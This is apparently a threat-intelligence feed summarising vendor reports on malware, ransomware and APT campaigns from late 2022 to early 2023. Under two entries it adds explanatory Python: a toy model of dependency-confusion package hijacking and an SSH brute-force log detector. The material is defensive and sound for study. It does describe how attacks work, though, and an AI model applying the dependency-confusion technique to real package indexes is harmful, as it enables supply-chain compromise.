- Cyble
- Intel Name:
- Rhadamanthys_Stealer_Leverages_Google_Ads_in_the_wild
- Date of Scan:
- 2023-01-14
- Impact:
- LOW
- Summary:
- Researchers from Cyble found a new malware strain, Rhadamanthys Stealer, leveraging spam and phishing campaigns through Google Ads and redirecting users to fake phishing websites of popular software. The malware, downloaded in the background of legitimate files or through obfuscated images, steals sensitive information to further aid unauthorized access.
Source:
https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
—
- Intel Source:
- PaloAlto
- Intel Name:
- PurpleUrchin_Campaign_Bypass_CAPTCHA_and_Steals_Cloud_Platform_Resources
- Date of Scan:
- 2023-01-14
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have analyzed Automated Libra, the cloud threat actor group behind the freejacking campaign PurpleUrchin. Automated Libra is a South African-based freejacking group that primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their cryptomining operations.
Source:
https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/
—
- Intel Source:
- Esentire
- Intel Name:
- Gootloader_Malware_returns_with_revamped_infection_technique
- Date of Scan:
- 2023-01-14
- Impact:
- LOW
- Summary:
- Researchers from Esentire found Gootloader malware activity with a new infection technique, further leading to Cobalt Strike, which leveraged an existing PowerShell process that beaconed to various malicious domains. The attacker seems to be hands-on, dropping multiple payloads, including BloodHound and PsExec, while being persistent and targeting different areas for further compromise.
Source:
https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity
—
- Intel Source:
- Wordfence
- Intel Name:
- Spike_in_Holiday_Attacks_Targeting_Ancient_Vulnerabilities_and_Hidden_Webshells
- Date of Scan:
- 2023-01-13
- Impact:
- LOW
- Summary:
- Researchers from Wordfence have observed spikes in attack traffic over the Christmas and New Year holidays, which is specifically targeting the Downloads Manager plugin by Giulio Ganci.
—
- Intel Source:
- ASEC
- Intel Name:
- Orcus_RAT_being_distributed_on_file_sharing_sites
- Date of Scan:
- 2023-01-13
- Impact:
- LOW
- Summary:
- The ASEC analysis team recently identified Orcus RAT being distributed on file-sharing sites disguised as a cracked version of Hangul Word Processor.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- RAT_Malware_Campaign_Using_Polyglot_Files_to_Evade_Detection
- Date of Scan:
- 2023-01-13
- Impact:
- LOW
- Summary:
- Deep Instinct researchers have identified that operators of the StrRAT and Ratty remote access trojans (RAT) are running a new campaign using polyglot MSI/JAR and CAB/JAR files to evade detection from security tools.
Source:
https://www.deepinstinct.com/blog/malicious-jars-and-polyglot-files-who-do-you-think-you-jar
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Unpatched_Vulnerability_to_Bypass_Windows_OS_Security_Feature
- Date of Scan:
- 2023-01-13
- Impact:
- MEDIUM
- Summary:
- EclecticIQ analysts researched QakBot phishing campaigns that have switched to a zero-day vulnerability to evade Windows Mark of the Web (MoTW). QakBot may be able to increase its infection success rate as a result of the switch to a zero-day exploit.
—
- Intel Source:
- Rapid7
- Intel Name:
- Research_on_HIVE_Ransomware_attacks
- Date of Scan:
- 2023-01-13
- Impact:
- MEDIUM
- Summary:
- Rapid7 monitors and researches the range of techniques that threat actors use to conduct malicious activity. Recently, Rapid7 observed malicious activity by a threat actor performing several known techniques for distributing ransomware across many systems within a victim’s environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to drop the defenses of the victim, inhibit monitoring, disable networking and allow time for the ransomware to finish encrypting files.
Source:
https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Deep_Investigation_of_FortiOS_Zero_Day_Attack
- Date of Scan:
- 2023-01-13
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have analyzed how the zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations.
—
- Intel Source:
- Bitdefender
- Intel Name:
- A_Deep_Dive_into_EyeSpy_Spyware
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Researchers from Bitdefender have analyzed spyware named EyeSpy, which is marketed as a legitimate monitoring application, arrives on the system via Trojanized installers, and targets Iranian users trying to download VPN solutions to bypass Internet restrictions in their country.
—
- Intel Source:
- Avast
- Intel Name:
- The_Examine_of_NeedleDropper_Malware
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Avast researchers have analyzed the NeedleDropper malware, a self-extracting archive that contains a modified AutoIt interpreter, an obfuscated AutoIt script, and a Visual Basic script, which is used for initial execution.
Source:
https://decoded.avast.io/threatresearch/needledropper/
—
- Intel Source:
- Fortinet
- Intel Name:
- Ransomware_variants_across_the_OSINT_community
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs monitors and gathers data weekly on ransomware variants that have been catching on in their datasets and across the OSINT community. Their ransomware report provides insights into the ransomware landscape and the Fortinet solutions that protect against those variants.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-monti-blackhunt-and-more
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_sample_analyses_Dec_24_31_2022
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- The ASEC analysis team continues to monitor phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from December 24th, 2022 to December 31st, 2022 and provides statistical information on each type.
—
- Intel Source:
- Group-IB
- Intel Name:
- Dark_Pink_APT_Group_Targeting_Asia_Pacific_Region
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- Group-IB researchers have identified a new wave of attacks that have struck the Asia-Pacific (APAC) region by the Dark Pink APT group.
—
- Intel Source:
- SentinelOne
- Intel Name:
- NoName057_16_Hacking_Group_Targeting_NATO
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have observed the pro-Russian hacking group named NoName057(16) targeting Czech presidential election candidates’ websites.
Source:
https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Hackers_From_Scattered_Spider_Using_Old_Intel_Driver_to_Bypass_Security
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- CrowdStrike researchers have identified a financially motivated threat actor named Scattered Spider, observed attempting to deploy Intel Ethernet diagnostics drivers in a BYOVD (Bring Your Own Vulnerable Driver) attack to evade detection by EDR (Endpoint Detection and Response) security products.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Gootkit_Loader_Campaign_Targeting_Australian_Healthcare_Industry
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have analyzed a series of attacks and discovered that Gootkit is leveraging SEO poisoning for its initial access and abusing legitimate tools like VLC Media Player.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Mirai_Botnet_aka_Katana
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Mirai Botnet aka Katana. Mirai is one of the first major botnets to target Linux-based vulnerable networking devices. It was discovered in August 2016 and its name means “future” in Japanese.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-mirai-botnet-aka-katana-active-iocs-4
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_DanaBot_Trojan
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of the DanaBot Trojan. DanaBot is a persistent and ever-evolving threat that has been circulating in the wild since 2018; it was originally marketed as a Malware-as-a-Service (MaaS) offering that primarily targeted banking fraud and data theft.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-danabot-trojan-active-iocs-45
—
- Intel Source:
- Cybereason
- Intel Name:
- Diving_Deep_into_IcedID_Malware
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Cybereason researchers have analyzed IcedID infection that illustrates the tactics, techniques, and procedures (TTPs) used in a recent campaign. It is also known as BokBot, which is traditionally known as a banking trojan used to steal financial information from its victims.
Source:
https://www.cybereason.com/blog/threat-analysis-from-icedid-to-domain-compromise
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_sample_analyses
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- The ASEC analysis team continues to monitor phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from December 18th, 2022 to December 24th, 2022 and provides statistical information on each type.
—
- Intel Source:
- Phylum
- Intel Name:
- A_Novel_Info_Stealer_RAT_leveraging_PYPI
- Date of Scan:
- 2023-01-11
- Impact:
- LOW
- Summary:
- Phylum researchers have identified a novel malware campaign targeting the Python Package Index (PyPI): a combination of RAT and stealer that exfiltrates various data while persisting and opening tunnels. The RAT being spread has a web GUI, reflecting the continued focus on supply chain attacks.
Source:
https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Magecart_Skimmer_Using_MRSNIFFA_Toolkit
- Date of Scan:
- 2023-01-11
- Impact:
- LOW
- Summary:
- Malwarebytes Labs researchers have identified a Magecart skimmer using the mr.SNIFFA toolkit and infrastructure from DDoS-Guard. The domain names used to serve the skimmer referenced public figures or names well-known in the cryptocurrency world.
—
- Intel Source:
- Intrinsec
- Intel Name:
- Emotet_Malware_resurfaces_deploying_loaders_through_Spear_Phishing
- Date of Scan:
- 2023-01-11
- Impact:
- MEDIUM
- Summary:
- Researchers from Intrinsec uncovered Emotet’s latest spam campaign spreading malicious documents in the wild, in addition to targeted spear-phishing emails. The malware returns with new obfuscation techniques and revamped loader capabilities.
Source:
https://www.intrinsec.com/emotet-returns-and-deploys-loaders/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Dridex_Malware_Returns_and_Targeting_MacOS
- Date of Scan:
- 2023-01-11
- Impact:
- LOW
- Summary:
- TrendMicro researchers have analyzed Dridex, an online banking malware variant targeting MacOS platforms with a new technique to deliver documents embedded with malicious macros to users.
Source:
https://www.trendmicro.com/en_us/research/23/a/-dridex-targets-macos-using-new-entry-method.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/-dridex-returns-targets-macos-using-new-entry-method/iocs-dridex-returns-targets-macos-using-new-entry-method.txt
—
- Intel Source:
- Cyble
- Intel Name:
- LummaC2_Stealer_Targeting_Chromium_and_Mozilla_Based_Browsers
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a post on the cybercrime forum about an information stealer named LummaC2 Stealer targeting both Chromium and Mozilla-based browsers.
Source:
https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/
—
- Intel Source:
- Mandiant
- Intel Name:
- Russian_Turla_Cyberspies_via_USB_Delivered_Malware
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Recently, the Russian state-sponsored threat actor Turla launched attacks against Ukraine leveraging Andromeda malware most likely deployed by other hackers via an infected USB drive, Mandiant reported. Mandiant researchers analyzed a suspected Turla operation, UNC4210, and discovered that at least three expired Andromeda command and control (C&C) domains had been re-registered and used for victim profiling.
Source:
https://www.mandiant.com/resources/blog/turla-galaxy-opportunity
—
- Intel Source:
- Uptycs
- Intel Name:
- InfoStealer_Targeting_Italian_Region
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Researchers from Uptycs have observed a new infostealer campaign in which the threat actors delivered spam or phishing emails with the subject “Invoice”, targeting Italy specifically.
Source:
https://www.uptycs.com/blog/infostealer-malware-attacks-targeting-italian-region/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- DShield_Sensor_JSON_Log_Analysis
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed DShield sensor JSON logs over a 9-day period.
—
- Intel Source:
- 360Netlab
- Intel Name:
- The_modified_CIA_attack_kit_Hive_enters_the_field_of_black_and_gray_production
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- 360Netlab researchers have observed xdr33, a backdoor derived from the CIA Hive attack kit. Its main purpose is to collect sensitive information and provide a foothold for subsequent intrusions.
Source:
https://blog.netlab.360.com/warning-hive-variant-xdr33-is-coming_cn/
—
- Intel Source:
- Symantec
- Intel Name:
- Bluebottle_Campaign_Hits_Banks_With_Signed_Malware
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified the Bluebottle campaign, which hits banks in French-speaking countries in Africa with activity that leverages new TTPs.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Agent_Tesla_Malware
- Date of Scan:
- 2023-01-10
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Agent Tesla malware. Agent Tesla is a very popular spyware Trojan built on the .NET framework. It grabs data from the victim’s clipboard, logs keystrokes, captures screenshots, and gains access to the victim’s webcam. It can also terminate running analysis tools and anti-virus applications.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-agent-tesla-malware-active-iocs-81
—
- Intel Source:
- DFIR Report
- Intel Name:
- The_Details_Examination_of_Ursnif_Malware
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Researchers from The DFIR Report have analyzed an Ursnif intrusion that started with a malicious ISO file delivered to users.
Source:
https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
—
- Intel Source:
- Resecurity
- Intel Name:
- Drug_trafficking_and_illegal_pharmacies_compete_on_the_dark_web
- Date of Scan:
- 2023-01-10
- Impact:
- MEDIUM
- Summary:
- Researchers from Resecurity have identified that the top 10 marketplaces currently represent the core ecosystem of drug trafficking on the dark web, which is split between actors from multiple regions and influence groups.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Brazil_Malspam_Pushing_Astaroth
- Date of Scan:
- 2023-01-09
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified four Portuguese language emails targeting Brazil. These messages are pushing the same type of Astaroth (Guildma) malware.
—
- Intel Source:
- Aqua Blog
- Intel Name:
- Diving_Deep_into_PyTorch_Dependency_Confusion_Administered_Malware
- Date of Scan:
- 2023-01-09
- Impact:
- LOW
- Summary:
- Aqua researchers have analyzed the dependency confusion attack that targeted a dependency of the widely used PyTorch-nightly Python package, resulting in thousands of users downloading a malicious binary that exfiltrated data through DNS.
Source:
https://blog.aquasec.com/pytorch-dependency-confusion-administered-malware
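The mechanism behind a dependency confusion attack, as an added example that is not part of the Aqua post or the PyTorch project: when an installer treats an internal index and the public index as equals, the highest version number wins regardless of where it lives, so an attacker who registers an internal package name publicly with an absurd version gets installed. Exact version pins with artifact hashes close that gap. The package names, versions, index contents and the `Candidate` model are all constructed for this illustration.

```python
"""Added example (not from the Aqua post): a toy model of why mixing an internal
package index with the public one is dangerous, and how exact pins with hashes
close the gap. All package names, versions and index contents are constructed."""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Candidate:
    index: str          # which index served this artifact
    name: str
    version: tuple      # parsed as a tuple of ints so it sorts numerically
    sha256: str


def parse_version(v: str) -> tuple:
    return tuple(int(p) for p in v.split("."))


def sha256_of(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


# Constructed indexes: name -> version -> artifact bytes.
INTERNAL_INDEX = {"acme-auth": {"1.4.2": b"internal build of acme-auth"}}
PUBLIC_INDEX = {
    "acme-auth": {"99.0.0": b"attacker-registered acme-auth"},  # squatted name
    "requests": {"2.28.1": b"legitimate public package"},
}
INDEXES = {"internal": INTERNAL_INDEX, "public": PUBLIC_INDEX}


def candidates(name: str, indexes: dict) -> list:
    out = []
    for index_name, index in indexes.items():
        for ver, blob in index.get(name, {}).items():
            out.append(Candidate(index_name, name, parse_version(ver), sha256_of(blob)))
    return out


def resolve_highest(name: str, indexes: dict) -> Candidate:
    """Weak behaviour: every index is treated equally and the highest version
    wins, wherever it lives (what pip does with --extra-index-url)."""
    cands = candidates(name, indexes)
    if not cands:
        raise LookupError(name)
    return max(cands, key=lambda c: c.version)


def resolve_pinned(name: str, pin: dict, indexes: dict) -> Candidate:
    """Hardened behaviour: accept only the exact pinned version whose artifact
    hash matches, so a higher version on another index is never considered."""
    want = parse_version(pin["version"])
    for c in candidates(name, indexes):
        if c.version == want and c.sha256 == pin["sha256"]:
            return c
    raise ValueError(f"no artifact of {name} matches pinned version and hash")


def confusable_names(internal: dict, public: dict) -> list:
    """Pre-flight check: internal package names that also exist publicly are
    exactly the ones an attacker can hijack with a higher version number."""
    return sorted(set(internal) & set(public))
```

`resolve_highest("acme-auth", INDEXES)` returns the attacker's 99.0.0 build from the public index, while `resolve_pinned` with the internal build's hash returns the internal artifact and rejects everything else. In practice the equivalent controls are a single `--index-url` pointing at a private proxy that mirrors the public index, plus `--require-hashes` lockfiles; `confusable_names` is the audit to run before an attacker does it for you.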
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Zoom_Application
- Date of Scan:
- 2023-01-09
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have identified a phishing campaign that abuses the Zoom application to deliver the IcedID malware. This malware primarily targets businesses and can be used to steal payment information.
Source:
https://blog.cyble.com/2023/01/05/zoom-users-at-risk-in-latest-malware-campaign/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Blindeagle_Targeting_Ecuador_Based_Organizations
- Date of Scan:
- 2023-01-06
- Impact:
- LOW
- Summary:
- Researchers from Check Point (CPR) have identified a campaign targeting Ecuador-based organizations, with a new infection chain that involves a more advanced toolset.
Source:
https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/
—
- Intel Source:
- Rewterz
- Intel Name:
- PatchWork_APT_Group_Targeting_Pakistan
- Date of Scan:
- 2023-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of the PatchWork APT group. This Indian threat actor has been active since December 2015 and has recently been using spear phishing to strike Pakistan. PatchWork (also known as Mahabusa, White Elephant, hangOver, VICEROY TIGER, and The Dropping Elephant) is an APT that mainly conducts cyber-espionage activities against its targets.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Amadey_Botnet
- Date of Scan:
- 2023-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of the Amadey botnet. Amadey infects a victim’s computer and incorporates it into a botnet. The Amadey trojan can also download additional malware and exfiltrate user information to a command and control (C2) server.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-amadey-botnet-active-iocs-21
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_SmokeLoader_Malware
- Date of Scan:
- 2023-01-05
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of SmokeLoader malware. This malware is mostly used to load additional malicious software, which is often obtained from a third-party source. SmokeLoader can also load its own modules, allowing it to perform several activities without the use of additional components.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-smokeloader-malware-active-iocs-55
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_DarkCrystal_Agent_Tesla_Malware
- Date of Scan:
- 2023-01-05
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Agent Tesla malware. Agent Tesla is a very popular spyware Trojan built on the .NET framework. It grabs data from the victim’s clipboard, logs keystrokes, captures screenshots, and gains access to the victim’s webcam. It can also terminate running analysis tools and anti-virus applications.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-agent-tesla-malware-active-iocs-81
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_CrySIS_aka_Dharma_Ransomware
- Date of Scan:
- 2023-01-05
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of CrySIS aka Dharma Ransomware. CrySIS, also known as Dharma, is a group of ransomware that has been active since 2016. Researchers indicate the spam emails attempt to disguise themselves as invoice emails. In reality, the spam is being used to infect users with the Ursnif keylogger or the Dharma ransomware.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-crysis-aka-dharma-ransomware-active-iocs-2
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Ursnif_Banking_Trojan
- Date of Scan:
- 2023-01-05
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Ursnif Banking Trojan. The attackers have switched to using Trojans such as Ursnif to steal other types of data, including email configurations, as well as credentials and passwords stored in the web browsers and even digital wallets. Threat actors use different techniques to make a victim fall into their trap like a phishing email.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-active-iocs-43
—
- Intel Source:
- ASEC
- Intel Name:
- Installing_CoinMiner_by_malware
- Date of Scan:
- 2023-01-05
- Impact:
- LOW
- Summary:
- The ASEC analysis team observed a new Linux malware, developed with Shell Script Compiler (Shc), that installs a CoinMiner. They assess that after the attackers successfully authenticated via a dictionary attack against inadequately managed Linux SSH servers, several malware samples were installed on the target system: the Shc downloader, the XMRig CoinMiner installed through it, and a DDoS IRC bot written in Perl.
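The SSH dictionary attack that opens this intrusion leaves a distinctive trace in the server's authentication log: a burst of failed logins from one source, often across several usernames, followed by an accepted login from the same source. The following detector over such log lines is an added example, not code from ASEC; the `auth.log` lines it scans are constructed for the example and follow the standard OpenSSH syslog format, and the threshold and window values are assumptions to tune per environment.

```python
"""Added example (not ASEC's code): flag SSH dictionary attacks in auth.log
style lines and, more importantly, a successful login that follows one.
The sample log below is constructed; the threshold and window are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH syslog lines: "Mon DD HH:MM:SS host sshd[pid]: Failed|Accepted password|publickey for [invalid user] USER from IP port N ssh2"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse(line: str):
    """Return (timestamp, result, user, ip) or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; fine for comparing events inside one window
    return datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["result"], m["user"], m["ip"]


def detect(lines, threshold: int = 5, window: timedelta = timedelta(minutes=10)) -> list:
    """Sliding-window count of failures per source IP. Emits one 'bruteforce'
    alert when an IP crosses the threshold and a 'bruteforce_success' alert
    for any accepted login from an IP that is still inside a failure burst."""
    failures = defaultdict(deque)   # ip -> timestamps of failures within window
    users_tried = defaultdict(set)  # ip -> usernames attempted
    flagged, alerts = set(), []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        q = failures[ip]
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if result == "Failed":
            q.append(ts)
            users_tried[ip].add(user)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip,
                               "failures": len(q), "users": sorted(users_tried[ip])})
        elif result == "Accepted" and len(q) >= threshold:
            alerts.append({"type": "bruteforce_success", "ip": ip, "user": user})
    return alerts


# Constructed sample: one attacker spraying four usernames, then getting in as root,
# and one legitimate user who mistyped a password once before using a key.
SAMPLE_AUTH_LOG = """\
Jan 10 03:12:01 web01 sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 50211 ssh2
Jan 10 03:12:03 web01 sshd[2103]: Failed password for invalid user oracle from 203.0.113.7 port 50214 ssh2
Jan 10 03:12:05 web01 sshd[2105]: Failed password for root from 203.0.113.7 port 50219 ssh2
Jan 10 03:12:07 web01 sshd[2107]: Failed password for root from 203.0.113.7 port 50222 ssh2
Jan 10 03:12:09 web01 sshd[2109]: Failed password for invalid user test from 203.0.113.7 port 50225 ssh2
Jan 10 03:12:11 web01 sshd[2111]: Failed password for root from 203.0.113.7 port 50228 ssh2
Jan 10 03:12:40 web01 sshd[2130]: Accepted password for root from 203.0.113.7 port 50301 ssh2
Jan 10 03:15:22 web01 sshd[2150]: Failed password for alice from 198.51.100.9 port 41000 ssh2
Jan 10 03:15:30 web01 sshd[2152]: Accepted publickey for alice from 198.51.100.9 port 41002 ssh2
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

Run against the sample, the detector raises one `bruteforce` alert for 203.0.113.7 (five failures across admin, oracle, root and test) and then a `bruteforce_success` alert for the accepted root password login from the same address; alice's single typo followed by a key-based login produces nothing. The second alert type is the one worth paging on, since it marks the point at which the Shc downloader described above would be dropped.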
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_DarkCrystal_RAT_(DCRat)
- Date of Scan:
- 2023-01-05
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of DarkCrystal RAT. DCRat is a Russian backdoor that was initially introduced in 2018. The malware’s modular architecture allows it to be extended for a variety of nefarious objectives, including surveillance, reconnaissance, data theft, DDoS attacks, and arbitrary code execution.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-darkcrystal-rat-dcrat-active-iocs-21
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_LockBit_Ransomware
- Date of Scan:
- 2023-01-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of LockBit Ransomware. LockBit attacks leave few traces for forensic analysis as the malware loads into the system memory, with logs and supporting files removed upon execution.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-ransomware-active-iocs-11
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Qakbot_(Qbot)_Malware
- Date of Scan:
- 2023-01-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Qakbot (Qbot) malware. QakBot is a banking Trojan that steals financial data from infected systems and also acts as a loader, using its C2 servers to select and download further payloads.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-qakbot-qbot-malware-active-iocs-52
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_DarkyLock_Ransomware
- Date of Scan:
- 2023-01-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of DarkyLock Ransomware. The ransomware attacks all commonly used file formats, including media, documents, databases, and archive files.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-darkylock-ransomware-active-iocs
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_RedLine_Stealer_Ransomware
- Date of Scan:
- 2023-01-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of RedLine Stealer. This malware first appeared in March 2020, spread across several countries during the COVID-19 pandemic, and is still active today.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-redline-stealer-active-iocs-69
—
- Intel Source:
- Security Joes
- Intel Name:
- The_Insurance_&_Financial_Institutes_In_Europe_are_targeted_by_Raspberry_Robin
- Date of Scan:
- 2023-01-04
- Impact:
- LOW
- Summary:
- Threat researchers from Security Joes observed and responded twice this month to attacks that used a framework called Raspberry Robin.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Cobalt_Strike_Malware
- Date of Scan:
- 2023-01-04
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Cobalt Strike Malware. Cobalt Strike lets the attacker install a ‘Beacon’ agent on the target PC which provides the attacker with a plethora of capabilities, including command execution, file transfer, keylogging, mimikatz, port scanning, and privilege escalation.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-cobalt-strike-malware-active-iocs-40
—
- Intel Source:
- DrWeb
- Intel Name:
- The_infection_of_WordPress_based_websites
- Date of Scan:
- 2023-01-04
- Impact:
- LOW
- Summary:
- Researchers from Doctor Web found a malicious Linux program capable of compromising websites based on the WordPress CMS. It exploits 30 vulnerabilities in a number of plugins and themes for this platform and injects malicious JavaScript into sites that run outdated versions of those add-ons without the relevant fixes.
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_European_Government_Organizations_targeted_by_RedDelta_threat_group
- Date of Scan:
- 2022-12-30
- Impact:
- MEDIUM
- Summary:
- Researchers from Recorded Future are tracking the activity of RedDelta, which they attribute to a likely Chinese state-sponsored threat activity group targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor.
—
- Intel Source:
- Guardio
- Intel Name:
- Hackers_Abusing_Google_AdWords
- Date of Scan:
- 2022-12-30
- Impact:
- LOW
- Summary:
- Researchers from Guardio have identified a new technique that abuses Google’s powerful Ads advertising platform to spread rogue promoted search results at scale.
—
- Intel Source:
- SlowMist
- Intel Name:
- Lazarus_Threat_Group_Using_Phishing_Domains_to_Target_NFT_Investors
- Date of Scan:
- 2022-12-30
- Impact:
- MEDIUM
- Summary:
- Researchers from SlowMist have identified a massive phishing campaign targeting NFT investors. It observed that the attackers set up nearly 500 decoy sites with malicious Mints.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_WildFire_malware_team_monitoring_malware_techniques
- Date of Scan:
- 2022-12-30
- Impact:
- LOW
- Summary:
- Palo Alto Unit 42 researchers analyzed in depth how malware authors and malware variants change behavior when they detect that they are running in a sandbox. They shared and discussed many of the sandboxing approaches in use, with the pros and cons of each, and the many evasion types they face.
Source:
https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/
—
- Intel Source:
- Zscaler
- Intel Name:
- ArkeiStealer_masquerade_as_a_trading_application
- Date of Scan:
- 2022-12-28
- Impact:
- LOW
- Summary:
- Researchers from ThreatLabz discovered that threat actors are now distributing ArkeiStealer through Windows Installer binaries which masquerade as a trading application. The trading application is backdoored with the SmokeLoader downloader which further downloads an information stealer.
Source:
https://www.zscaler.com/blog/security-research/trade-with-caution
—
